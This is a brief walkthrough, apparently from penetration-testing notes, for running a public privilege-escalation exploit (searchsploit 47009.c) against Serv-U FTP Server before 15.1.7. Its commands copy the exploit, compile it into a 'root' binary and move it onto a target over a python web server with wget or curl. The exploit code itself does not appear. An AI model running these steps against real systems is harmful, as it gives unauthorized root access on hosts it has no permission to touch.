Serv-U FTP Server < 15.1.7

1)import exploit from searchsploit

sudo searchsploit -m 47009.c

2)compile with gcc

sudo gcc 47009.c -o root

3)Move to kali /tmp, python server and wget or curl into target

./root

Last updated